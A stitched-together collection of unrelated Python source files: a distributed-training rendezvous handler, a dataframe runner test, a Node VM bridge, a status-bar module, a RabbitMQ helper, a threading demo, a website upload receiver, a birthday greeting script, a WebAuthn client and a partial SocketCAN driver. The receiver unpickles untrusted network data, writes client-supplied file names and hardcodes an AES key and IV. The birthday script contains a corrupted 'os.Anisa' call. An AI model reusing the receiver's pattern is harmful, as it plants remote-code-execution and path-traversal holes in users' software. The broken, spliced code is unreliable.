), "Max number of workers cannot be less than min number of workers"
timeout = int(params.get("timeout", CONST_DEFAULT_OVERALL_TIMEOUT))
last_call_timeout = int(
params.get("last_call_timeout", CONST_DEFAULT_LAST_CALL_TIMEOUT)
)
kwargs = _parse_etcd_client_params(params)
# Etcd rendezvous implementation
etcd_rdzv = EtcdRendezvous(
endpoints=etcd_endpoints,
prefix=etcd_prefix,
run_id=run_id,
num_min_workers=num_min_workers,
num_max_workers=num_max_workers,
timeout=timeout,
last_call_timeout=last_call_timeout,
**kwargs,
)
return EtcdRendezvousHandler(rdzv_impl=etcd_rdzv)
# torchelastic.rendezvous.RendezvousHandler using etcd (API v2):
register_rendezvous_handler("etcd", _etcd_rendezvous_handler)
|
test_window_runner.py
|
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from typing import Dict
import threading
from queue import Queue
from towhee.dataframe import DataFrame
from towhee.engine.operator_io.reader import BatchFrameReader
from towhee.engine.operator_runner.runner_base import RunnerStatus
from towhee.engine.operator_runner.window_runner import WindowRunner
from towhee.tests.mock_operators.sum_operator.sum_operator import SumOperator
DATA_QUEUE = Queue()
class MockWriter:
def __init__(self):
self.res = []
def write(self, data: Dict):
self.res.append(data)
def run(runner):
runner.process()
class TestRunner(unittest.TestCase):
"""
MapRunner test
"""
def test_window_runner(self):
writer = MockWriter()
df_in = DataFrame('op_test_in', {'num': {'type': 'int', 'index': 0}})
# We
runner = WindowRunner('window_test', 0, 'sum_operator',
'mock_operators', {},
[BatchFrameReader(df_in, {'num': 0}, 5, 3)],
writer)
runner.set_op(SumOperator())
t = threading.Thread(target=run, args=(runner, ))
t.start()
self.assertEqual(runner.status, RunnerStatus.RUNNING)
for _ in range(100):
df_in.put_dict({'num': 1})
df_in.seal()
runner.join()
self.assertEqual(runner.status, RunnerStatus.FINISHED)
self.assertEqual(len(writer.res), 68)
count = 0
for item in writer.res:
if count < 64:
self.assertEqual(item.sum, 5)
elif count < 66:
self.assertEqual(item.sum, 4)
else:
self.assertEqual(item.sum, 1)
count += 1
def test_window_runner_with_error(self):
writer = MockWriter()
df_in = DataFrame('op_test_in', {'num': {'type': 'int', 'index': 0}})
# We
runner = WindowRunner('window_test', 0, 'sum_operator',
'mock_operators', {},
[BatchFrameReader(df_in, {'num': 0}, 5, 3)],
writer)
runner.set_op(SumOperator())
t = threading.Thread(target=run, args=(runner, ))
t.start()
self.assertEqual(runner.status, RunnerStatus.RUNNING)
df_in.put(('error_data',))
df_in.seal()
runner.join()
self.assertEqual(runner.status, RunnerStatus.FAILED)
|
__init__.py
|
#! python3
import atexit
import json
from queue import Queue
import sys
from threading import Thread, Event, Lock
from subprocess import Popen, PIPE
from os import path, environ
from .__pkginfo__ import __version__
NODE_EXECUTABLE = "node"
VM_SERVER = path.join(path.dirname(__file__), "vm-server")
def eval(code, **options):
"""A shortcut to eval JavaScript.
:param str code: The code to be run.
:param options: Additional options sent to :meth:`VM.__init__`.
This function will create a :class:`VM`, run the code, and return the
result.
"""
with VM(**options) as vm:
# https://github.com/PyCQA/pylint/issues/3450
# pylint: disable=no-member
return vm.run(code)
DEFAULT_BRIDGE = None
def default_bridge():
global DEFAULT_BRIDGE
if DEFAULT_BRIDGE is not None:
return DEFAULT_BRIDGE
DEFAULT_BRIDGE = VMServer().start()
return DEFAULT_BRIDGE
@atexit.register
def close():
if DEFAULT_BRIDGE is not None:
DEFAULT_BRIDGE.close()
class BaseVM:
"""BaseVM class, containing some common methods for VMs.
"""
def __init__(self, server=None):
"""
:param VMServer server: Optional. If provided, the VM will be created
on the server. Otherwise, the VM will be created on a default
server, which is started on the first creation of VMs.
"""
if server is None:
server = default_bridge()
self.bridge = server
self.id = None
self.event_que = None
self.console = "off"
def __enter__(self):
"""This class can be used as a context manager, which automatically
:meth:`create` when entering the context.
"""
self.create()
return self
def __exit__(self, exc_type, exc_value, traceback):
"""See :meth:`destroy`"""
self.destroy()
def before_create(self, data):
"""Overwrite. Extend data before creating the VM."""
pass
def create(self):
"""Create the VM."""
data = {"action": "create"}
self.before_create(data)
self.id = self.communicate(data)
self.bridge.add_vm(self)
return self
def destroy(self):
"""Destroy the VM."""
self.communicate({"action": "destroy"})
self.bridge.remove_vm(self)
self.id = None
return self
def communicate(self, data):
"""Communicate with server. Wraps :meth:`VMServer.communicate` so we
can add additional properties to data.
This method would raise an :class:`VMError` if vm-server response an
error.
"""
data["vmId"] = self.id
data = self.bridge.communicate(data)
if data["status"] != "success":
raise VMError(data["error"])
return data.get("value")
class VM(BaseVM):
"""VM class, represent `vm2.VM <https://github.com/patriksimek/vm2#vm>`_.
"""
def __init__(self, code=None, server=None, **options):
"""
:param str code: Optional JavaScript code to run after creating
the VM. Useful to define some functions.
:param VMServer server: Optional VMServer. See :class:`BaseVM`
for details.
:param options: The options for `vm2.VM`_.
"""
super().__init__(server)
self.id = None
self.code = code
self.options = options
def before_create(self, data):
"""Create VM."""
data.update(type="VM", code=self.code, options=self.options)
def run(self, code):
"""Execute JavaScript and return the result.
If the server responses an error, a :class:`VMError` will be raised.
"""
return self.communicate({"action": "run", "code": code})
def call(self, function_name, *args):
"""Call a function and return the result.
:param str function_name: The function to call.
:param args: Function arguments.
function_name can include "." to call functions on an object. However,
it is called like:
.. code-block:: javascript
var func = vm.run("function.to.call");
return func(...args);
So ``this`` keyword might doesn't work as expected.
"""
return self.communicate({
"action": "call",
"functionName": function_name,
"args": args
})
class NodeVM(BaseVM):
"""NodeVM class, represent `vm2.NodeVM
<https://github.com/patriksimek/vm2#nodevm>`_.
"""
def __init__(self, server=None, **options):
"""
:param VMServer server: Optional VMServer. See :class:`BaseVM`
for details.
:param options: the options for `vm2.NodeVM`_.
If ``console="redirect"``, those console output will return as events,
stored in an event queue, which could be accessed with
:attr:`event_que`.
"""
super().__init__(server)
self.options = options
self.console = options.get("console", "inherit")
self.event_que = Queue()
"""A :class:`queue.Queue` object containing console events.
An event is a :class:`dict` and you can get the text value with:
.. code:: python
event = self.event_que.get()
text = event.get("value")
"""
def before_create(self, data):
"""Create NodeVM."""
data.update(type="NodeVM", options=self.options)
def run(self, code, filename=None):
"""Run the code and return a :class:`NodeVMModule`.
:param str code: The code to be run. The code should look like a
commonjs module (or an IIFE module, according to the options). See
`vm2.NodeVM`_ for details.
:param str filename: Optional, used for stack trace. Currently this
has no effect. (should vm-server send traceback back?)
:return: :class:`NodeVMModule`.
"""
id = self.communicate({
"action": "run",
"code": code,
"filename": filename
})
return NodeVMModule(id, self)
@classmethod
def code(cls, code, filename=None, **kwargs):
"""A class method helping you create a module in VM.
:param str code: The code sent to :meth:`run`.
:param str filename: The filename sent to :meth:`run`.
:param kwargs: Other arguments are sent to constructor.
.. code-block:: python
with NodeVM() as vm:
module = vm.run(code)
result = module.call_member("method")
vs.
.. code-block:: python
with NodeVM.code(code) as module:
result = module.call_member("method")
# access the vm with `module.vm`
"""
vm = cls(**kwargs)
module = vm.create().run(code, filename)
module.CLOSE_ON_EXIT = True
return module
class NodeVMModule:
"""Since we can only pass JSON between python and node, we use
this wrapper to access the module created by :meth:`NodeVM.run`.
This class shouldn't be initiated by users directly.
You can access the VM object with attribute :attr:`NodeVMModule.vm`.
"""
def __init__(self, id, vm):
self.id = id
self.vm = vm
self.CLOSE_ON_EXIT = False
def __enter__(self):
"""This class can be used as a context manager. See :meth:`NodeVM.code`.
"""
return self
def __exit__(self, exc_type, exc_value, tracback):
"""Destroy the VM if:
1. This method is called.
2. The module is created by :meth:`NodeVM.code`.
"""
if self.CLOSE_ON_EXIT:
self.vm.destroy()
def communicate(self, data):
"""Wraps :meth:`vm.communicate`. So we can set additional properties
on the data before communication.
"""
data["moduleId"] = self.id
return self.vm.communicate(data)
def call(self, *args):
"""Call the module, in case that the module itself is a function."""
return self.communicate({
"action": "call",
"args": args
})
def get(self):
"""Return the module, in case that the module itself is json-encodable.
"""
return self.communicate({
"action": "get"
})
def call_member(self, member, *args):
"""Call a function member.
:param str member: Member's name.
:param args: Function arguments.
"""
return self.communicate({
"action": "callMember",
"member": member,
"args": args
})
def get_member(self, member):
"""Return member value.
:param str member: Member's name.
"""
return self.communicate({
"action": "getMember",
"member": member
})
def destroy(self):
"""Destroy the module.
You don't need this if you can just destroy the VM.
"""
out = self.communicate({
"action": "destroyModule"
})
if self.CLOSE_ON_EXIT:
self.vm.destroy()
return out
class VMServer:
"""VMServer class, represent vm-server. See :meth:`start` for details."""
def __init__(self, command=None):
"""
:param str command: the command to spawn node process. If not set, it
would use:
1. Environment variable ``NODE_EXECUTABLE``
2. "node"
"""
self.closed = None
self.process = None
self.vms = {}
self.poll = {}
self.write_lock = Lock()
self.poll_lock = Lock()
self.inc = 1
if command is None:
command = environ.get("NODE_EXECUTABLE", NODE_EXECUTABLE)
self.command = command
def __enter__(self):
"""This class can be used as a context manager, which automatically
:meth:`start` the server.
.. code-block:: python
server = VMServer()
server.start()
# create VMs on the server...
server.close()
vs.
.. code-block:: python
with VMServer() as server:
# create VMs on the server...
"""
return self.start()
def __exit__(self, exc_type, exc_value, traceback):
"""See :meth:`close`."""
self.close()
def start(self):
"""Spawn a Node.js subprocess and run vm-server.
vm-server is a REPL server, which allows us to connect to it with
stdios. You can find the script at ``node_vm2/vm-server`` (`Github
<https://github.com/eight04/node_vm2/tree/master/node_vm2/vm-server>`__).
Communication using JSON::
> {"id": 1, "action": "create", "type": "VM"}
{"id": 1, "status": "success"}
> {"id": 2, "action": "run", "code": "var a = 0; a += 10; a"}
{"id": 2, "status": "success", "value": 10}
> {"id": 3, "action": "xxx"}
{"id": 3, "status": "error", "error": "Unknown action: xxx"}
A :class:`VMError` will be thrown if the node process cannot be spawned.
"""
if self.closed:
raise VMError("The VM is closed")
args = [self.command, VM_SERVER]
try:
self.process = Popen(args, bufsize=0, stdin=PIPE, stdout=PIPE) # pylint: disable=consider-using-with
except FileNotFoundError as err:
raise VMError(f"Failed starting VM server. '{self.command}' is unavailable.") from err
except Exception as err:
raise VMError("Failed starting VM server") from err
def reader():
for data in self.process.stdout:
try:
# FIXME: https://github.com/PyCQA/pylint/issues/922
data = json.loads(data.decode("utf-8")) or {}
except json.JSONDecodeError:
# the server is down?
self.close()
return
if data["type"] == "response":
with self.poll_lock:
self.poll[data["id"]][1] = data
self.poll[data["id"]][0].set()
elif data["type"] == "event":
try:
vm = self.vms[data["vmId"]]
except KeyError:
# the vm is destroyed
continue
if data["name"] == "console.log":
if vm.console == "redirect":
vm.event_que.put(data)
elif vm.console == "inherit":
sys.stdout.write(data.get("value", "") + "\n")
elif data["name"] == "console.error":
if vm.console == "redirect":
vm.event_que.put(data)
elif vm.console == "inherit":
sys.stderr.write(data.get("value", "") + "\n")
Thread(target=reader, daemon=True).start()
data = self.communicate({"action": "ping"})
if data["status"] == "error":
raise VMError("Failed to start: " + data["error"])
self.closed = False
return self
def close(self):
"""Close the server. Once the server is closed, it can't be
re-open."""
if self.closed:
return self
try:
data = self.communicate({"action": "close"})
if data["status"] == "error":
raise VMError("Failed to close: " + data["error"])
except OSError:
# the process is down?
pass
self.process.communicate()
self.process = None
self.closed = True
with self.poll_lock:
for event, _data in self.poll.values():
event.set()
return self
def add_vm(self, vm):
self.vms[vm.id] = vm
def remove_vm(self, vm):
del self.vms[vm.id]
def generate_id(self):
"""Generate unique id for each communication."""
inc = self.inc
self.inc += 1
return inc
def communicate(self, data):
"""Send data to Node and return the response.
:param dict data: must be json-encodable and follow vm-server's
protocol. An unique id is automatically assigned to data.
This method is thread-safe.
"""
id = self.generate_id()
data["id"] = id
text = json.dumps(data) + "\n"
event = Event()
with self.poll_lock:
self.poll[id] = [event, None]
# FIXME: do we really need lock for write?
with self.write_lock:
self.process.stdin.write(text.encode("utf-8"))
event.wait()
with self.poll_lock:
data = self.poll[id][1]
del self.poll[id]
return data
class VMError(Exception):
"""Errors thrown by VM."""
pass
|
anybar.py
|
import threading
import socket
from i3pystatus import IntervalModule
class AnyBar(IntervalModule):
"""
This module shows dot with given color in your panel.
What color means is up to you. When to change color is also up to you.
It's a port of https://github.com/tonsky/AnyBar to i3pystatus.
Color can be changed by sending text to UDP port.
Check the original repo how to do it.
"""
colors = {
"black": "#444444", # 4C4C4C
"black_alt": "#FFFFFF",
"blue": "#4A90E2",
"cyan": "#27F2CB",
"exclamation": "#DE504C", # vary
"green": "#80EB0C",
"orange": "#FF9F00",
"purple": "#9013FE",
"question": "#4C4C4C", # vary
"question_alt": "#FFFFFF",
"red": "#CF0700",
"white": "#4C4C4C", # border
"white_alt": "#FFFFFF",
"yellow": "#FFEC00",
}
color = '#444444'
port = 1738
interval = 1
settings = (
("port", "UDP port to listen"),
("color", "initial color"),
)
def main_loop(self):
""" Mainloop blocks so we thread it."""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
port = int(getattr(self, 'port', 1738))
sock.bind(('127.0.0.1', port))
while True:
data, addr = sock.recvfrom(512)
color = data.decode().strip()
self.color = self.colors.get(color, color)
def init(self):
try:
t = threading.Thread(target=self.main_loop)
t.daemon = True
t.start()
except Exception as e:
self.output = {
"full_text": "Error creating new thread!",
"color": "#AE2525"
}
def run(self):
self.output = {
"full_text": "●",
"color": self.color
}
|
rabbit.py
|
# -*- coding: utf-8 -*-
"""
Created on 21 August 2017
@author: dgrossman
"""
import logging
import threading
import time
from functools import partial
import pika
class Rabbit(object):
'''
Base Class for RabbitMQ
'''
def __init__(self):
self.logger = logging.getLogger('rabbit')
def make_rabbit_connection(self, host, port, exchange, queue_name, keys,
total_sleep=float('inf')): # pragma: no cover
'''
Connects to rabbitmq using the given hostname,
exchange, and queue. Retries on failure until success.
Binds routing keys appropriate for module, and returns
the channel and connection.
'''
wait = True
do_rabbit = True
rabbit_channel = None
rabbit_connection = None
while wait and total_sleep > 0:
try:
# Starting rabbit connection
rabbit_connection = pika.BlockingConnection(
pika.ConnectionParameters(host=host, port=port)
)
rabbit_channel = rabbit_connection.channel()
rabbit_channel.exchange_declare(exchange=exchange,
exchange_type='topic')
rabbit_channel.queue_declare(queue=queue_name, exclusive=False)
self.logger.debug(
'connected to {0} rabbitmq...'.format(host))
wait = False
except Exception as e:
self.logger.debug(
'waiting for connection to {0} rabbitmq...'.format(host))
self.logger.debug(str(e))
time.sleep(2)
total_sleep -= 2
wait = True
if wait:
do_rabbit = False
if isinstance(keys, list) and not wait:
for key in keys:
self.logger.debug(
'array adding key:{0} to rabbitmq channel'.format(key))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=key)
if isinstance(keys, str) and not wait:
self.logger.debug(
'string adding key:{0} to rabbitmq channel'.format(keys))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=keys)
return rabbit_channel, rabbit_connection, do_rabbit
def start_channel(self, channel, mycallback, queue, m_queue):
''' handle threading for messagetype '''
self.logger.debug(
'about to start channel {0}'.format(channel))
channel.basic_consume(queue, partial(mycallback, q=m_queue))
mq_recv_thread = threading.Thread(target=channel.start_consuming)
mq_recv_thread.start()
return mq_recv_thread
|
3.thread_GIL.py
|
import threading
from queue import Queue
import copy
import time
def job(l, q):
res = sum(l)
q.put(res)
def multithreading(l):
q = Queue()
threads = []
for i in range(4):
t = threading.Thread(target=job, args=(copy.copy(l), q), name='T%i' % i)
t.start()
threads.append(t)
[t.join() for t in threads]
total = 0
for _ in range(4):
total += q.get()
print(total)
def normal(l):
total = sum(l)
print(total)
if __name__ == '__main__':
l = list(range(1000000))
s_t = time.time()
normal(l*4)
print('normal: ',time.time()-s_t)
s_t = time.time()
multithreading(l)
print('multithreading: ', time.time()-s_t)
|
website_receiver.py
|
import socket
import threading
import pickle
import os
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import unpad
import sys
AES_ENCRYPTION_KEY = b"N44vCTcb<W8sBXD@"
AES_BLOCKSIZE = 16
AES_IV = b"PoTFg9ZlV?g(bH8Z"
LISTEN_PORT = 1337
CHUNK_SIZE = 16384
GOOGLE_DNS_IP = "8.8.8.8"
DNS_PORT = 53
client_threads = []
websites_folder = ""
def recv_data_in_chunks(sock, total_size, chunk_size):
'''
This function recieves data of size total_size using given socket in chunks of chunk_size.
'''
full_data = b''
# Recieve the data pieces and join them together
while len(full_data) < total_size:
chunk_data = sock.recv(chunk_size)
print(f"Recieved {len(chunk_data)}")
full_data = full_data + chunk_data
# Return the decrypted data
return decrypt_data(full_data)
def json_to_folder(folder_json, relative_path=''):
'''
This function converts the given json-formatted data to a folder and saves it.
The format is:
{
"type" : "folder",
"name" : "the name of the folder",
"entries" : [
{
"type" : "file",
"name" : "the name of the file",
"data" : "either textual or binary data"
},
{
"type" : "folder",
"name" : "the name of the folder",
"entries" : [...]
},
...
]
}
'''
# Prepare the relative_path for a recursive call or a entry saving
relative_path += os.path.basename(folder_json['name']) + '/'
# Create directory for the folder
print('%s: Creating...' % (relative_path))
try:
os.mkdir(relative_path)
except:
# The folder already exists, let the client know that he should rename it
return 'RENAME'
# Wait until the system creates the folder
while not os.path.exists(relative_path):
pass
print('%s: Created!' % (relative_path))
# For each entry in the folder's entry-list
for entry in folder_json['entries']:
if entry['type'] == 'file':
# Write the data to the file
open(relative_path + entry['name'], "wb").write(entry['data'])
elif entry['type'] == 'folder':
# Convert the json to a folder recursively
json_to_folder(entry, relative_path)
return 'DONE'
def handle_client(client_socket, client_addr):
'''
This function handles a connection to a client that wants to host a website.
'''
print('%s: Connected!' % (str(client_addr)))
# Get the serialized data *length* from the client
data_length = int(client_socket.recv(CHUNK_SIZE).decode())
# Agree or deny to receive the data
if data_length > 0:
print('%s: OK (%d bytes)' % (str(client_addr), data_length))
client_socket.send(b'OK')
else:
print('%s: DENIED' % (str(client_addr)))
client_socket.send(b'DENIED')
return None
print('%s: Recieving and Deserializing data...' % (str(client_addr)))
# Recieve the folder data from the client and decrypt it
serialized_data = recv_data_in_chunks(client_socket, data_length, CHUNK_SIZE)
# Deserialize the folder data
website_folder_json = pickle.loads(serialized_data)
print('%s: Creating folder...' % (str(client_addr)))
# Save the folder and make sure that it has an unique name
while json_to_folder(website_folder_json, websites_folder) == 'RENAME':
client_socket.send(b'RENAME')
new_name = client_socket.recv(CHUNK_SIZE).decode().split(':')[1]
website_folder_json['name'] = os.path.basename(new_name)
# End the client serving
client_socket.send(b'DONE')
print('Finished serving %s' % (str(client_addr)))
def decrypt_data(data):
'''
This function uses the Cryptodome.Cipher library to encrypt the given data using the AES algoritm.
Note: AES is out dated. The only reason Im using AES is that it's simple for educational purposes.
'''
# Create an instance of a AES object that let's us decrypt our data
# key - The encryption key. Random string hard-coded at the top of the code.
# Note: The same key must be used in the encrypting endpoint, and the key's length must be 8.
# IV - The initial value of the encryption.
# Note: According to the protocol of AES, the length of the IV must be a multiple of 8.
aes_encryptor = AES.new(AES_ENCRYPTION_KEY, AES.MODE_CBC, AES_IV)
# Encrypt the given data, then return it
return unpad(aes_encryptor.decrypt(data), AES_BLOCKSIZE)
def get_my_ip():
'''
This function return the local IP of the current machine.
'''
# Create a UDP socket and connect to google's DNS service
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.connect((GOOGLE_DNS_IP, DNS_PORT))
# Retrieve the ip of the current machine from the connected socket
local_ip = udp_socket.getsockname()[0]
return local_ip
def main():
global websites_folder
# Get the websites folder from the arguments
# Make sure that these's a possible folder given
if len(sys.argv) > 1:
# if the folder exists
if os.path.exists(sys.argv[1]) and os.path.isdir(sys.argv[1]):
websites_folder = sys.argv[1]
# Make sure that the path ends with a slash
if not websites_folder.endswith('\\') and not websites_folder.endswith('/'):
websites_folder += "\\"
else:
print("The given directory does not exist.\nUsing the current directory as the websites folder.")
else:
print("No directory was given.\nUsing the current directory as the websites folder.")
# Initialize the listening socket and start listening for clients
listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_ip_address = get_my_ip()
listening_socket.bind((local_ip_address, LISTEN_PORT))
listening_socket.listen()
print('Listening for clients on %s:%d...' % (local_ip_address, LISTEN_PORT))
while True:
# Accept a client, create a thread for him and start handling his connection
client_socket, client_address = listening_socket.accept()
client_thread = threading.Thread(target=handle_client, args=(client_socket, client_address))
client_threads.append(client_thread)
client_thread.start()
# Make sure that all the clients' threads are closed
for thead in client_threads:
thead.join()
if __name__ == "__main__":
main()
|
PyBirthdayWish.py
|
#!/usr/bin/python3
import os,random
from threading import Thread
from time import sleep
import vlc
from termcolor import colored
from config import *
# Importing module specified in the config file
art = __import__(f'arts.{artFile}', globals(), locals(), ['*'])
def replaceMultiple(mainString, toBeReplace, newString):
"""[Replace a set of multiple sub strings with a new string]
Args:
mainString ([string]): [String in which the replacement will be done]
toBeReplace ([list]): [A list which elements will be replaced by a newString]
newString ([string]): [A string which will be replaced in place of elements of toBeReplace]
Returns:
[string]: [Return the main string where the element of toBeReplace is replaced by newString]
"""
# Iterate over the list to be replaced
for elem in toBeReplace :
# Check if the element is in the main string
if elem in mainString :
# Replace the string
mainString = mainString.replace(elem, newString)
return mainString
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
def pprint(art,time):
color_used = [random.choice(color)]
colorAttribute = []
for i in range(len(art)):
if art[i] in colorCodes:
# Color attr set to blink if 9
if art[i] == '⑨':
colorAttribute = [colorCodes[art[i]]]
# color attr none if 10
elif art[i] == '⑩':
colorAttribute = []
# Random color if R
elif art[i] == '®':
color_used = color
else:
color_used = [colorCodes[art[i]]]
print(colored(replaceMultiple(art[i],colorCodes,''),random.choice(color_used),attrs=colorAttribute),sep='', end='',flush= True);sleep(time)
def pAudio():
if playAudio:
p = vlc.MediaPlayer(resource_path(audio))
p.play()
# Code reader
with open(resource_path(__file__)) as f_in:
code = f_in.read()
def pcode():
# Print the code before wishing
if codePrint:
for i in range(len(code)):
print(colored(code[i], codeColor),sep='', end='',flush= True);sleep(codingSpeed)
input('\n\n'+colored('python3','blue')+colored(' PyBirthdayWish.py','yellow'))
os.system('cls' if os.name == 'nt' else 'clear')
else:
input(colored('press F11 and hit {Enter}...','blue'))
os.system('cls' if os.Anisa == 'nt' else 'clear')
# Clearing terminal
os.system('cls' if os.Anisa == 'nt' else 'clear')
try:
pcode()
Thread(target = pAudio).start()
Thread(target = pprint, args=(art.mainArt,speed)).start()
input()
except KeyboardInterrupt:
print(colored('\n[-] Thanks!!','red'))
os._exit(0)
|
webauthn.py
|
"""
Copyright 2018-present SYNETIS.
Licensed under the Apache License, Version 2.0 (the "License");
You may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and* limitations under the License.*
"""
from __future__ import print_function, absolute_import, unicode_literals
import base64
from threading import Event, Thread
from fido2.client import Fido2Client, ClientError
from fido2.hid import CtapHidDevice, STATUS
from gimme_aws_creds.errors import NoFIDODeviceFoundError, FIDODeviceTimeoutError
class FakeAssertion(object):
def __init__(self):
self.signature = b'fake'
self.auth_data = b'fake'
class WebAuthnClient(object):
@staticmethod
def _correct_padding(data):
if len(data) % 4:
data += '=' * (4 - len(data) % 4)
return data
def __init__(self, ui, okta_org_url, challenge, credentialid):
"""
:param okta_org_url: Base URL string for Okta IDP.
:param challenge: Challenge
:param credentialid: credentialid
"""
self.ui = ui
self._okta_org_url = okta_org_url
self._clients = None
self._has_prompted = False
self._challenge = challenge
self._cancel = Event()
self._assertions = None
self._client_data = None
self._rp = {'id': okta_org_url[8:], 'name': okta_org_url[8:]}
self._allow_list = [{
'type': 'public-key',
'id': base64.urlsafe_b64decode(self._correct_padding(credentialid))
}]
def locate_device(self):
# Locate a device
devs = list(CtapHidDevice.list_devices())
if not devs:
self.ui.info('No FIDO device found')
raise NoFIDODeviceFoundError
self._clients = [Fido2Client(d, self._okta_org_url) for d in devs]
def on_keepalive(self, status):
if status == STATUS.UPNEEDED and not self._has_prompted:
self.ui.info('\nTouch your authenticator device now...\n')
self._has_prompted = True
def work(self, client):
try:
self._assertions, self._client_data = client.get_assertion(
self._rp['id'], self._challenge, self._allow_list, timeout=self._cancel, on_keepalive=self.on_keepalive
)
except ClientError as e:
if e.code == ClientError.ERR.DEVICE_INELIGIBLE:
self.ui.info('Security key is ineligible') # TODO extract key info
return
elif e.code != ClientError.ERR.TIMEOUT:
raise
else:
return
self._cancel.set()
def verify(self):
# If authenticator is not found, prompt
try:
self.locate_device()
except NoFIDODeviceFoundError:
self.ui.input('Please insert your security key and press enter...')
self.locate_device()
threads = []
for client in self._clients:
t = Thread(target=self.work, args=(client,))
threads.append(t)
t.start()
for t in threads:
t.join()
if not self._cancel.is_set():
self.ui.info('Operation timed out or no valid Security Key found !')
raise FIDODeviceTimeoutError
return self._client_data, self._assertions[0]
|
_socketcan.py
|
# Copyright (c) 2019 UAVCAN Consortium
# This software is distributed under the terms of the MIT License.
# Author: Pavel Kirienko <pavel@uavcan.org>
import enum
import time
import errno
import typing
import socket
import struct
import select
import asyncio
import logging
import threading
import contextlib
import pyuavcan.transport
from pyuavcan.transport import Timestamp
from pyuavcan.transport.can.media import Media, Envelope, FilterConfiguration, FrameFormat
from pyuavcan.transport.can.media import DataFrame
# Disable unused ignore warning for this file only because there appears to be no other way to make MyPy
# accept this file both on Windows and GNU/Linux.
# mypy: warn_unused_ignores=False
_logger = logging.getLogger(__name__)
class SocketCANMedia(Media):
"""
This media implementation provides a simple interface for the standard Linux SocketCAN media layer.
If you are testing with a virtual CAN bus and you need CAN FD, you may need to enable it manually
(https://stackoverflow.com/questions/36568167/can-fd-support-for-virtual-can-vcan-on-socketcan);
otherwise, you may observe errno 90 "Message too long". Configuration example::
ip link set vcan0 mtu 72
SocketCAN documentation: https://www.kernel.org/doc/Documentation/networking/can.txt
"""
def __init__(self, iface_name: str, mtu: int, loop: typing.Optional[asyncio.AbstractEventLoop] = None) -> None:
"""
CAN Classic/FD is selected automatically based on the MTU. It is not possible to use CAN FD with MTU of 8 bytes.
:param iface_name: E.g., ``can0``.
:param mtu: The maximum data field size in bytes. CAN FD is used if this value > 8, Classic CAN otherwise.
This value must belong to Media.VALID_MTU_SET.
:param loop: The event loop to use. Defaults to :func:`asyncio.get_event_loop`.
"""
self._mtu = int(mtu)
if self._mtu not in self.VALID_MTU_SET:
raise ValueError(f"Invalid MTU: {self._mtu} not in {self.VALID_MTU_SET}")
self._iface_name = str(iface_name)
self._loop = loop if loop is not None else asyncio.get_event_loop()
self._is_fd = self._mtu > _NativeFrameDataCapacity.CAN_CLASSIC
self._native_frame_data_capacity = int(
{
False: _NativeFrameDataCapacity.CAN_CLASSIC,
True: _NativeFrameDataCapacity.CAN_FD,
}[self._is_fd]
)
self._native_frame_size = _FRAME_HEADER_STRUCT.size + self._native_frame_data_capacity
self._sock = _make_socket(iface_name, can_fd=self._is_fd)
self._ctl_main, self._ctl_worker = socket.socketpair() # This is used for controlling the worker thread.
self._closed = False
self._maybe_thread: typing.Optional[threading.Thread] = None
self._loopback_enabled = False
self._ancillary_data_buffer_size = socket.CMSG_SPACE(_TIMEVAL_STRUCT.size) # Used for recvmsg()
super().__init__()
@property
def loop(self) -> asyncio.AbstractEventLoop:
return self._loop
@property
def interface_name(self) -> str:
return self._iface_name
@property
def mtu(self) -> int:
return self._mtu
@property
def number_of_acceptance_filters(self) -> int:
"""
512 for SocketCAN.
- https://github.com/torvalds/linux/blob/9c7db5004280767566e91a33445bf93aa479ef02/net/can/af_can.c#L327-L348
- https://github.com/torvalds/linux/blob/54dee406374ce8adb352c48e175176247cb8db7c/include/uapi/linux/can.h#L200
"""
return 512
def start(self, handler: Media.ReceivedFramesHandler, no_automatic_retransmission: bool) -> None:
if self._maybe_thread is None:
self._maybe_thread = threading.Thread(
target=self._thread_function, name=str(self), args=(handler,), daemon=True
)
self._maybe_thread.start()
if no_automatic_retransmission:
_logger.info("%s non-automatic retransmission is not supported", self)
else:
raise RuntimeError("The RX frame handler is already set up")
def configure_acceptance_filters(self, configuration: typing.Sequence[FilterConfiguration]) -> None:
if self._closed:
raise pyuavcan.transport.ResourceClosedError(repr(self))
_logger.info(
"%s FIXME: acceptance filter configuration is not yet implemented; please submit patches! "
"Requested configuration: %s",
self,
", ".join(map(str, configuration)),
)
async def send(self, frames: typing.Iterable[Envelope], monotonic_deadline: float) -> int:
num_sent = 0
for f in frames:
if self._closed:
raise pyuavcan.transport.ResourceClosedError(repr(self))
self._set_loopback_enabled(f.loopback)
try:
await asyncio.wait_for(
self._loop.sock_sendall(self._sock, self._compile_native_frame(f.frame)),
timeout=monotonic_deadline - self._loop.time(),
)
except asyncio.TimeoutError:
break
else:
num_sent += 1
return num_sent
def close(self) -> None:
try:
self._closed = True
if self._ctl_main.fileno() >= 0: # Ignore if already closed.
self._ctl_main.send(b"stop") # The actual data is irrelevant, we just need it to unblock the select().
if self._maybe_thread:
self._maybe_thread.join(timeout=_SELECT_TIMEOUT)
self._maybe_thread = None
finally:
self._sock.close() # These are expected to be idempotent.
self._ctl_worker.close()
self._ctl_main.close()
def _thread_function(self, handler: Media.ReceivedFramesHandler) -> None:
